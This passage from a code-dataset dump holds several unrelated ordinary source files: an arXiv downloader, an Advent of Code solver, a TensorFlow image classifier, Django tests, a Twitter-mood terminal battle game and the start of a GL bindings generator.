self.categories:\n raise ValueError(f'{category} not in available categories')\n\n articles = set()\n for entry in self.entries:\n for category_ in entry['categories']:\n if category_ == category:\n articles.add(entry['label'])\n\n return articles\n\n def get_url_from_label(self, label):\n '''Get url from article label'''\n\n url = None\n for entry in self.entries:\n if label == entry['label']:\n url = entry['url']\n\n if url is None:\n raise ValueError(f'{label} not found')\n else:\n return url\n\ndef pdf_url_from_article_url(url):\n '''Get arXiv pdf url from abstract url'''\n\n return url[:18] + 'pdf' + url[21:] + '.pdf'\n\ndef download_pdf_from_article_url(url):\n '''Download arXiv pdf'''\n\n url = pdf_url_from_article_url(url)\n\n filename = url.split(\"/\")[-1]\n\n with urllib.request.urlopen(url) as response, open(filename, 'wb') as outfile:\n data = response.read()\n outfile.write(data)\n","sub_path":"arxiv.py","file_name":"arxiv.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"353558404","text":"import re\n\nPROD = True\n\n\nr = re.compile(r\"^[^0-9]+([0-9]+)$\")\ncre = re.compile(r\"^([a-z]+)[\\s]+([0-9]+)[\\s]+([0-9]+)[\\s]+([0-9]+)$\")\n\nregs = [0] * 6\n\n\ndef call(op, a, b, c):\n if op == \"seti\":\n regs[c] = a\n elif op == \"setr\":\n regs[c] = regs[a]\n elif op == \"addi\":\n regs[c] = regs[a] + b\n elif op == \"addr\":\n regs[c] = regs[a] + regs[b]\n elif op == \"muli\":\n regs[c] = regs[a] * b\n elif op == \"mulr\":\n regs[c] = regs[a] 
* regs[b]\n elif op == \"bani\":\n regs[c] = regs[a] & b\n elif op == \"banr\":\n regs[c] = regs[a] & regs[b]\n elif op == \"bori\":\n regs[c] = regs[a] | b\n elif op == \"borr\":\n regs[c] = regs[a] | regs[b]\n elif op == \"gtir\":\n regs[c] = 1 if a > regs[b] else 0\n elif op == \"gtri\":\n regs[c] = 1 if regs[a] > b else 0\n elif op == \"gtrr\":\n regs[c] = 1 if regs[a] > regs[b] else 0\n elif op == \"eqir\":\n regs[c] = 1 if a == regs[b] else 0\n elif op == \"eqri\":\n regs[c] = 1 if regs[a] == b else 0\n elif op == \"eqrr\":\n regs[c] = 1 if regs[a] == regs[b] else 0\n\n\ndef step(prog):\n if regs[ip] >= len(prog):\n return False\n s = \"ip={} \".format(regs[ip]) + str(regs)\n op, a, b, c = prog[regs[ip]]\n s += \" {} {} {} {} \".format(op, a, b, c)\n call(op, a, b, c)\n s += str(regs)\n print(s)\n return True\n\n\nwith open(\"input.txt\") as f:\n text = f.read().splitlines()\n if not PROD:\n text = \"\"\"# ip 0\nseti 5 0 1\nseti 6 0 2\naddi 0 1 0\naddr 1 2 3\nsetr 1 0 0\nseti 8 0 4\nseti 9 0 5\"\"\".splitlines()\n\n ip = int(r.match(text[0]).group(1))\n\n prog = []\n for l in text[1:]:\n m = cre.match(l)\n prog.append((m.group(1), int(m.group(2)),\n int(m.group(3)), int(m.group(4))))\n\n regs[0] = 1\n regs = [0, 10551292, 9, 10551293, 0, 1]\n #regs = [0, 10551292, 13, 10551293, 1, 10551293]\n\n i = 0\n while step(prog):\n regs[ip] += 1\n i += 1\n if i > 50:\n break\n\n print(regs[0])\n'''\nEXPECT:\nip=0 [0, 0, 0, 0, 0, 0] seti 5 0 1 [0, 5, 0, 0, 0, 0]\nip=1 [1, 5, 0, 0, 0, 0] seti 6 0 2 [1, 5, 6, 0, 0, 0]\nip=2 [2, 5, 6, 0, 0, 0] addi 0 1 0 [3, 5, 6, 0, 0, 0]\nip=4 [4, 5, 6, 0, 0, 0] setr 1 0 0 [5, 5, 6, 0, 0, 0]\nip=6 [6, 5, 6, 0, 0, 0] seti 9 0 5 [6, 5, 6, 0, 0, 9]\n'''\n","sub_path":"day19/day19pt2.py","file_name":"day19pt2.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"636921583","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 12 08:16:45 2017\n\n@author: George\n\"\"\"\n\nimport pickle\nimport math\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tf_utils import predict_buildings_7layers, convert_to_one_hot\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\nimport glob\nimport copy\nfrom scipy import stats\nfrom sklearn.neighbors import KernelDensity\n\n#load parameters\nfileNumber = \"20171019-103626_7layer\"\nfilename_pickle = r\"C:\\\\Google Drive\\\\code\\\\python_code\\\\tensorFlow\\\\buildingIdentification\\\\parameters\\\\parameter_\" + fileNumber\n\nwith open(filename_pickle, 'rb') as handle:\n test_parameters = pickle.load(handle)\n\n\n\nmapPath = r\"D:\\\\neuralNet_data\\\\AerialImageDataset\\\\AerialImageDataset\\\\test\\\\mapSections2\\\\\"\ndataList = glob.glob(r\"D:\\neuralNet_data\\AerialImageDataset\\AerialImageDataset\\test\\mapSections2\\*.jpg\")\nnumberFiles = len(dataList)\n\nnum_px = 100\nimageVectorSize = num_px * num_px * 3\n\ndataList = []\nfor i in range(numberFiles):\n dataList.append(mapPath + \"IMG-\" +str(i) + \".jpg\")\n\n\n#trainList = dataList[0:8000]\ntestList = dataList[0:numberFiles]\n\ndef label(fileName):\n if \"notBuilding\" in fileName:\n return 0\n return 1\n\ndef processImage(fname, num_px):\n image = np.array(ndimage.imread(fname, flatten=False))\n image = scipy.misc.imresize(image, size=(num_px,num_px)).reshape((num_px,num_px,3))\n return image\n\n# Loading the data (cat/non-cat)\nX_test_orig = 
np.array([np.array(processImage(fname, num_px)) for fname in testList])\nY_test_orig = np.array([np.array(label(fname)) for fname in testList])\nY_test_orig = Y_test_orig.reshape(1,Y_test_orig.shape[0])\nclasses = np.array(('notBuilding','building'), dtype=\"str\")\n\nnum_labels = np.size(classes)\n\n# Flatten the training and test images\nX_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T\n# Normalize image vectors\nX_test = X_test_flatten/255.\n# Convert training and test labels to one hot matrices\nY_test = convert_to_one_hot(Y_test_orig, num_labels)\n\n\nprint (\"number of test examples = \" + str(X_test.shape[1]))\nprint (\"X_test shape: \" + str(X_test.shape))\nprint (\"Y_test shape: \" + str(Y_test.shape))\n\ndef create_placeholders(n_x, n_y):\n \"\"\"\n Creates the placeholders for the tensorflow session.\n \n Arguments:\n n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288)\n n_y -- scalar, number of classes (from 0 to 5, so -> 6)\n \n Returns:\n X -- placeholder for the data input, of shape [n_x, None] and dtype \"float\"\n Y -- placeholder for the input labels, of shape [n_y, None] and dtype \"float\"\n \n Tips:\n - You will use None because it let's us be flexible on the number of examples you will for the placeholders.\n In fact, the number of examples during test/train is different.\n \"\"\"\n\n ### START CODE HERE ### (approx. 2 lines)\n X = tf.placeholder(tf.float32,shape = [n_x, None])\n Y = tf.placeholder(tf.float32,shape = [n_y, None])\n ### END CODE HERE ###\n \n return X, Y\n\n\nimage_predictions = predict_buildings_7layers(X_test, test_parameters, X_test.shape[1], imageVectorSize)\n\narray = image_predictions.reshape((100,100))\n#array = np.flipud(array)\narray = np.uint8(array*255)\n\n#img = Image.open(r\"D:\\\\neuralNet_data\\\\AerialImageDataset\\\\AerialImageDataset\\\\test\\\\cropped\\\\IMG-11.jpg\")\nimg = Image.open(r\"D:\\\\neuralNet_data\\\\AerialImageDataset\\\\AerialImageDataset\\\\test\\\\cropped\\\\IMG-425.jpg\")\nimg2 = copy.deepcopy(img)\npiece = Image.fromarray(array)\nimg.paste(piece,(50,50))\n\n\nfig1 = plt.figure(1)\nplt.imshow(img)\nfig1.show()\n\nfig2 = plt.figure(2)\nplt.imshow(img2)\nfig2.show()\n\n\n# =============================================================================\n# #cluster analysis\n# def getPoints(array):\n# xAns = []\n# yAns = []\n# for x in range(array.shape[0]):\n# for y in range(array.shape[1]):\n# if array[x,y] > 0:\n# xAns.append(x)\n# yAns.append(y)\n# return np.array(xAns), np.array(yAns)\n# \n# def kde2D(x, y, bandwidth, xbins=100j, ybins=100j, **kwargs): \n# \"\"\"Build 2D kernel density estimate (KDE).\"\"\"\n# \n# # create grid of sample locations (default: 100x100)\n# xx, yy = np.mgrid[x.min():x.max():xbins, \n# y.min():y.max():ybins]\n# \n# xy_sample = np.vstack([yy.ravel(), xx.ravel()]).T\n# xy_train = np.vstack([y, x]).T\n# \n# kde_skl = KernelDensity(bandwidth=bandwidth, **kwargs)\n# kde_skl.fit(xy_train)\n# \n# # score_samples() returns the log-likelihood of the samples\n# z = np.exp(kde_skl.score_samples(xy_sample))\n# return xx, yy, np.reshape(z, xx.shape) \n# \n# xArray, yArray = getPoints(array)\n# kernel = stats.gaussian_kde(xArray,yArray)\n# \n# xx, yy, zz = kde2D(xArray,yArray,1.0)\n# plt.pcolormesh(xx, yy, zz)\n# plt.scatter(xArray, yArray, s=2, facecolor='white')\n# =============================================================================\n","sub_path":"tensorFlow/buildingIdentification/analyzeImage_7layers 2.py","file_name":"analyzeImage_7layers 
2.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"407301518","text":"from tkinter import *\nimport threading\n\ndef hello():\n while True:\n print(\"HELLOOO\")\ndef fine():\n while True:\n print(\"FINEeeeeeee\")\n\nth= threading.Thread(target=fine)\nth.start()\nwindow= Tk()\nbut1= Button(window, text= \"HEllo\", command=hello)\nbut1.pack()\n\n\n\nwindow.mainloop()","sub_path":"NeethuWork/Threaded/2buts.py","file_name":"2buts.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"267496436","text":"def getY(x): # digit sum of x\n y = 0\n while x > 0:\n y += x % 10\n x //= 10\n return y\n\na, n, m = map(int, input().split())\ncnt = 0\nfor y in range(1, 73):\n x = 1\n for t in range(1, n + 1):\n x *= (y + a) # x == (y + a)**n once the loop finishes\n if x <= m and getY(x) == y:\n cnt += 1\n\nprint(cnt)\n","sub_path":"AOJ/0384/0384.py","file_name":"0384.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"377963349","text":"from django.test import TestCase\nfrom django.utils import timezone\n\nfrom social.models import Post\nfrom users.models import Profile, User\n\n\nclass PostTestModel(TestCase):\n @classmethod\n def setUpTestData(cls):\n \"\"\"setUpTestData: Run once to set up non-modified data for all class methods.\"\"\"\n cls.user = User.objects.create(email='kornel@mail.com',\n username='kornel1')\n cls.profile = cls.user.profile\n cls.profile.bio = 'Northen man'\n cls.profile.city = 'Stockholm'\n cls.profile.website = 'facebook.com'\n\n cls.post = Post.objects.create(\n author=cls.profile,\n content='Learning tests in Django Framework',\n date_posted=timezone.now(),\n location='Tomaszów Mazowiecki')\n\n def setUp(self):\n \"\"\"setUp: Run once for every test method to setup clean data.\"\"\"\n pass\n\n def test_content_label(self):\n field_label = self.post._meta.get_field('content').verbose_name\n self.assertEquals(field_label, 'content')\n self.assertNotEquals(field_label, 'location')\n\n def test_location_max_length(self):\n max_length = self.post._meta.get_field('location').max_length\n self.assertEqual(max_length, 40)\n\n def test_object_name_post_id(self):\n expected_object_name = f'Post#{self.post.id}'\n self.assertEquals(expected_object_name, str(self.post))\n\n def test_get_absolute_url(self):\n self.assertEquals(self.post.get_absolute_url(), '/post/1/')\n","sub_path":"social/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"214033528","text":"# Peaks\r\n\r\n# My solution\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, 1, 0, -1]\r\n\r\nn = int(input())\r\narr = [list(map(int, input().split())) for _ in range(n)]\r\n# insert an all-zero row before the first and after the last row of the input 2D list\r\narr.insert(0, [0]*n)\r\narr.append([0]*n)\r\n\r\n# insert a 0 at the first and last column of the input 2D list\r\nfor i in arr:\r\n i.insert(0, 0)\r\n i.append(0)\r\n# the steps above complete the bordered grid given in the problem\r\n\r\ncnt = 0\r\nfor i in range(1, n+1):\r\n for j in range(1, n+1):\r\n check = 0\r\n for k in range(4): # lines 19 ~ 23 can be written in 2 lines! - all() returns True when everything it is given is truthy
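# e.g. if all(arr[i][j] > arr[i+dx[k]][j+dy[k]] for k in range(4)): cnt += 1 -- exactly what the lecture version below does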
\r\n if arr[i][j] > arr[i + dx[k]][j + dy[k]]: # use the dx, dy lists to compare the current cell with its four neighbours (up/down/left/right)\r\n check += 1\r\n if check == 4:\r\n cnt += 1\r\nprint(cnt)\r\n\r\n\r\n# Lecture code\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, 1, 0, -1]\r\n# lets a coordinate be moved in the four directions (up, down, left, right)\r\n\r\nn = int(input())\r\na = [list(map(int, input().split())) for _ in range(n)]\r\na.insert(0, [0] * n) # insert a zero-filled list as row 0 of the 2D list a\r\na.append([0] * n) # append a zero-filled list as the last row of the 2D list a\r\nfor x in a: # add a 0 at the front and back of every row (first and last column)\r\n x.insert(0, 0)\r\n x.append(0)\r\n\r\ncnt = 0\r\nfor i in range(1, n+1):\r\n for j in range(1, n+1):\r\n # all() is true when every expression inside the parentheses is true\r\n if all(a[i][j] > a[i+dx[k]][j+dy[k]] for k in range(4)): # confirms the value is greater than all four neighbours\r\n cnt += 1\r\nprint(cnt)","sub_path":"Inflearn/Search&Simulation/Search&Simulation_Peaks.py","file_name":"Search&Simulation_Peaks.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"165998052","text":"from django.shortcuts import render, get_object_or_404\nfrom django.views.generic.base import View\nfrom oms_cms.backend.languages.models import Lang\n\nfrom .models import Pages\n\n\nclass Page(View):\n \"\"\"Page output\"\"\"\n def get(self, request, lang=None, slug=None):\n if lang is None:\n lang = Lang.objects.get(is_default=True).slug\n if slug is not None:\n if Lang.objects.filter(slug=slug).exists():\n page = get_object_or_404(Pages, slug__isnull=True, lang__slug=slug, published=True)\n else:\n page = get_object_or_404(Pages, slug=slug, lang__slug=lang, published=True)\n else:\n page = get_object_or_404(Pages, slug__isnull=True, lang__slug=lang, published=True)\n return render(request, page.template, {\"page\": page})\n","sub_path":"oms_cms/backend/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"576092234","text":"\"\"\"Pokemon Battle GO!\"\"\"\nfrom twitter_search import geocodes\nfrom mood_score import calc_mood_score\nfrom mood_analysis import mood_analysis, text_emotions\nfrom sentiment_analysis import sentiment_analysis\nfrom random import randint\nimport random\nimport time\nfrom termcolor import colored, cprint\nimport colorama\n\ncolorama.init()\nfrom prints_module import delay_print, atk_txt, successful_block, unsuccessful_block\n\n\nclass Poketer:\n def __init__(self, name, mood, health, max_health, attack):\n self.name = name\n self.mood = mood\n self.health = health\n self.max_health = max_health\n self.attack = attack\n\n def attack_fnc(self, opponent_pokemon):\n opponent_pokemon.health -= self.attack\n atk_txt(self.name, opponent_pokemon.name, \"3 2 1...\")\n self.healthcheck_color(opponent_pokemon)\n\n def healthcheck_color(self, opponent_pokemon):\n\n if opponent_pokemon.health >= opponent_pokemon.max_health / 2:\n print(f\"{opponent_pokemon.name} hälsa: {colored(opponent_pokemon.health, 'green')}\\n\")\n elif opponent_pokemon.max_health / 4 <= opponent_pokemon.health <= opponent_pokemon.max_health / 2:\n print(f\"{opponent_pokemon.name} hälsa: {colored(opponent_pokemon.health, 'yellow')}\\n\")\n elif opponent_pokemon.health <= opponent_pokemon.max_health / 4:\n print(f\"{opponent_pokemon.name} hälsa: {colored(opponent_pokemon.health, 'red')}\\n\")\n\n def healthcheck(self, opponent_pokemon, opponent_name):\n if self.health <= 0 or opponent_pokemon.health <= 0:\n if opponent_pokemon.health <= 0:\n print(f'*** 
{opponent_name} Poketer {opponent_pokemon.name} svimmade. Du vann! ***')\n if self.health <= 0:\n print(f'*** Din poketer {self.name} svimmade. {opponent_name} vann! ***')\n alive = False\n return alive\n\n def block(self, opponent, opponent_pokemon):\n block_chance = randint(1, 11)\n if block_chance <= 7:\n time.sleep(1)\n self.health -= opponent_pokemon.attack // 2\n delay_print(f\"{opponent.name} attackerar {self.name}\", \"3 2 1...\", \"Boom!\") # Ändrade så att det stod \"attackerar\" som de andra printsatserna\n successful_block(self.name) # Flyttade ner denna så att den hamnar efter attacken, ser bättre ut\n print(f\"{self.name} tog {opponent_pokemon.attack // 2} i skada!\\n\")\n\n elif block_chance >= 8:\n time.sleep(1)\n self.health -= opponent_pokemon.attack\n delay_print(f\"{opponent.name} attackerar med {opponent_pokemon.name}\", \"3 2 1...\", \"Boom!\")\n unsuccessful_block(self.name)\n print(f\"{self.name} tog {opponent_pokemon.attack} i skada!\\n\")\n\n def update_max_health_by_city_mood(self, city, user_name):\n mood_score = calc_mood_score(self.mood, city, live=False)\n\n if mood_score == None:\n self.max_health += 20\n self.health += 20\n return None\n else:\n self.health += mood_score\n self.max_health += mood_score\n\n return mood_score\n\n def __repr__(self):\n return f'Poketer: {self.name} Mood: {self.mood}'\n\n\nclass User:\n def __init__(self, name):\n self.name = name\n self.team = []\n\n def add_team(self, poketer):\n self.team.append(poketer)\n\n def __repr__(self):\n return f'Namn: {self.name}, Team: {self.team}'\n\n\ndef main():\n user_pokemon = Poketer(colored(\"Happy Hasse\", 'blue'), \"happy\", 10, 10, 5)\n cpu_pokemon = Poketer(colored(\"Aggressive Ada\", 'red'), \"angry\", 10, 10, 5)\n\n cprint(f' Varmt välkomna till PokéMood!', 'cyan')\n\n cprint(colored(\"\"\"⢀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿\n ⣿⣿⣿⣿⣿⡏⠉⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⣿\n ⣿⣿⣿⣿⣿⣿⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠉⠁⠀⣿\n ⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠙⠿⠿⠿⠻⠿⠿⠟⠿⠛⠉⠀⠀⠀⠀⠀⣸⣿\n ⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣴⣿⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⢰⣹⡆⠀⠀⠀⠀⠀⠀⣭⣷⠀⠀⠀⠸⣿⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠈⠉⠀⠀⠤⠄⠀⠀⠀⠉⠁⠀⠀⠀⠀⢿⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⢾⣿⣷⠀⠀⠀⠀⡠⠤⢄⠀⠀⠀⠠⣿⣿⣷⠀⢸⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⡀⠉⠀⠀⠀⠀⠀⢄⠀⢀⠀⠀⠀⠀⠉⠉⠁⠀⠀⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿\\n\"\"\", \"yellow\"))\n\n username = input(\"Vänligen ange ditt namn: \")\n user = User(colored(username, 'blue'))\n cpu = User(colored(\"Olof\", 'red'))\n cpu_extra_s = (colored(\"s\", 'red'))\n user.add_team(user_pokemon)\n cpu.add_team(cpu_pokemon)\n print(f\"Hej {user.name}. Din poketer är {user_pokemon.name}.\")\n print(f\"Din motståndare är {cpu.name} och har valt poketer {cpu_pokemon.name}.\\n\")\n print(f\"{user.name}, det är din tur! \")\n\n\n x = \"\"\"Din Poketer har ett visst humör. Du har nu möjligheten att öka din Poketers hälsa genom\n att söka efter en stad i Sverige där du tror att invånarna är på samma humör som din Poketer.\n Invånarnas humör baseras på vad de twittrar. Ju mer känslosamma de är desto mer ökar \n din Poketers hälsa. Lycka till!\"\"\"\n print(f\"\"\"\\n\n ----------------------------------------------------------------------------------------------------\n * *\n {x} \n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n\n for idx, city in enumerate(geocodes):\n if city:\n print(idx + 1, city.capitalize())\n city_choice = int(input(f\"Vilken stad väljer du? 
(1-{len(geocodes) - 1}): \"))\n city_list = list(geocodes)\n city = city_list[city_choice - 1]\n\n mood_score = user_pokemon.update_max_health_by_city_mood(city, user.name)\n\n x = f\" ... Beräknar humör för invånarna i {city.capitalize()} ...\"\n y = f\"{user_pokemon.name} fick {mood_score} i ökad hälsa! #YOLO\"\n if not mood_score:\n y = f\"Något gick fel men {user_pokemon.name} får 20 p i ökad hälsa! #YOLO\"\n\n print(f\"\"\"\n ----------------------------------------------------------------------------------------------------\n * *\n {x}\n {y}\n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n cpu_city_choice = random.choice(city_list)\n mood_score = cpu_pokemon.update_max_health_by_city_mood(cpu_city_choice, cpu.name)\n x = f\"{cpu.name} valde {cpu_city_choice.capitalize()}\"\n y = f\"{cpu_pokemon.name} fick {mood_score} p i ökad hälsa! #FTW\"\n\n print(f\"\"\"\\n\n ****************************************************************************************************\n ^ ^\n {x}\n {y}\n ^ ^\n ****************************************************************************************************\n \"\"\")\n\n input(\"Tryck enter för att fortsätta\")\n\n x = \"\"\" Attack-bonus! Du har nu chansen att öka din Poketers attack-styrka. \n Välj en stad och gissa vilket humör som är mest förekommande \n bland invånarna. Lycka till! \"\"\"\n print(f\"\"\"\\n\n ----------------------------------------------------------------------------------------------------\n * *\n {x} \n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n for idx, city in enumerate(geocodes):\n if city:\n print(idx + 1, city.capitalize())\n city_choice = int(input(f\"Vilken stad väljer du? (1-{len(geocodes) - 1}): \"))\n city_list = list(geocodes)\n city = city_list[city_choice - 1]\n\n for idx, emotion in enumerate(text_emotions):\n print(idx + 1, emotion.capitalize())\n emotion_choice = int(input(f\"Vilken känsla är mest förekommande i {city.capitalize()}? (1-{len(text_emotions)}): \"))\n emotion_list = list(text_emotions)\n emotion = emotion_list[emotion_choice - 1]\n\n most_frequent_emotions = mood_analysis(city=city, live=False)\n\n attack_bonus = 10\n if emotion in most_frequent_emotions:\n user_pokemon.attack += attack_bonus\n x = f\"\"\"Rätt! Vanligast är att man är {emotion} i {city.capitalize()}.\n Din poketer belönas med {attack_bonus} p i ökad attack-styrka!\"\"\"\n else:\n x = f\"\"\"Tyvärr! I {city.capitalize()} är man {most_frequent_emotions[0]}, inte {emotion}!\n Du får ingen attack-bonus.\"\"\"\n\n print(f\"\"\"\n ----------------------------------------------------------------------------------------------------\n * *\n {x}\n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n x = f\"{cpu.name} valde Kiruna och gissade arg, vilket var rätt!\"\n y = f\"{cpu_pokemon.name} belönas med {attack_bonus} p i ökad attack-styrka! #FTW\"\n\n print(f\"\"\"\\n\n ****************************************************************************************************\n ^ ^\n {x}\n {y}\n ^ ^\n ****************************************************************************************************\n \"\"\")\n\n input(\"Tryck enter för att fortsätta\")\n\n\n x = \"\"\" Twitter-vadslagning! Har du koll på vad som trendar på sociala medier? \n Skriv in ett ord och på vilket språk du vill använda i sökningen. 
Gissa om \n de senaste tweetsen som innehåller detta ord är mest positiva, mest negativa\n eller neutrala. Om du gissar rätt belönas du med 10 p i ökad hälsa.\n Om du gissar fel bestraffas du med 10 p minskad hälsa. Lycka till! \"\"\"\n\n print(f\"\"\"\\n\n ----------------------------------------------------------------------------------------------------\n * *\n {x} \n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n print(\"Skriv in ett nyckelord att söka efter på Twitter. Exempel: COVID, Donald Trump, Estonia.\")\n keyword_choice = input(\">> \")\n\n language_choice = input(\"Vilket språk vill du söka efter? [S]venska eller [E]ngelska? \")\n if language_choice.lower() == \"s\":\n language_choice = \"swedish\"\n elif language_choice.lower() == \"e\":\n language_choice = \"english\"\n\n print(f\"Tror du folket på Twitter är mest positivt, mest negativt eller neutralt inställda till {keyword_choice}? \")\n attitude_choice = input(\"[P]ostiva - [N]egativa - ne[U]trala? \")\n if attitude_choice.lower() == \"p\":\n attitude_choice = \"positivt\"\n elif attitude_choice.lower() == \"n\":\n attitude_choice = \"negativt\"\n elif attitude_choice.lower() == \"u\":\n attitude_choice = \"neutralt\"\n\n print(\"Det här kan ta en liten stund... Vänligen vänta. :)\")\n\n # Ni får testköra genom att söka efter covid på engelska\n result = sentiment_analysis(keyword=keyword_choice, language=language_choice,\n file_name='demo_tweets_english_covid.p', live=False)\n\n health_bonus = 10\n if attitude_choice == result:\n user_pokemon.health += health_bonus\n user_pokemon.max_health += health_bonus\n x = f\"\"\"Rätt! {keyword_choice} har mest {result} innehåll på Twitter.\n Din pokemon belönas med {health_bonus} poäng i ökad hälsa!\"\"\"\n else:\n user_pokemon.health -= health_bonus\n user_pokemon.max_health -= health_bonus\n x = f\"\"\"Tyvärr, {keyword_choice} har mest {result} innehåll på Twitter!\n Din pokemon bestraffas med {health_bonus} p i minskad hälsa.\"\"\"\n\n print(f\"\"\"\n ----------------------------------------------------------------------------------------------------\n * *\n {x}\n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n input(\"Tryck enter för att fortsätta\")\n\n x = \"Nu är det dags för battle!\"\n\n print(f\"\"\"\n ----------------------------------------------------------------------------------------------------\n * *\n {x}\n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n input(\"Tryck enter för att fortsätta\")\n\n while (user_pokemon.health >= 0) and (cpu_pokemon.health >= 0):\n if user_pokemon.health <= 0 or cpu_pokemon.health <= 0:\n if cpu_pokemon.health <= 0:\n break\n if user_pokemon.health <= 0:\n print(f'*** Din poketer {user_pokemon.name} svimmade. {cpu.name} vann! ***')\n break\n\n else:\n print(f\"*** Det är {colored('Din', 'blue')} tur ***\")\n user_choose = int(input(\"Vill du [1] attackera eller [2] blockera? 
\"))\n if user_choose == 1:\n user_pokemon.attack_fnc(cpu_pokemon)\n if user_pokemon.healthcheck(cpu_pokemon, cpu.name) is False:\n break\n\n elif user_choose == 2:\n user_pokemon.block(cpu, cpu_pokemon)\n if user_pokemon.healthcheck(cpu_pokemon, cpu.name) is False:\n break\n\n if cpu_pokemon.health > 0:\n print(f'*** Det är {cpu.name}{cpu_extra_s} tur ***')\n cpu_pokemon.attack_fnc(user_pokemon)\n if user_pokemon.healthcheck(cpu_pokemon, cpu.name) is False:\n break\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sprint_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"294298810","text":"# Copyright (C) 2013 Bloomberg L.P. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport sys, os\n\nscriptDir = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, os.path.join(scriptDir, os.pardir, 'ui', 'gl'))\n\nimport generate_bindings # from src/ui/gl\n\ndef writeBindingCCFile(fCC, symbols):\n symbolMapping = {}\n for funcSet in generate_bindings.FUNCTION_SETS:\n funcSet = funcSet[0]\n for func in funcSet:\n for name in func.get('names', []):\n symbolMapping[name] = func\n for version in func.get('versions', []):\n symbolMapping[version['name']] = func\n if 'known_as' in func:\n symbolMapping[func['known_as']] = func\n\n # The following symbol mappings are for symbols that are present in the .def\n # files, but have no corresponding entry in 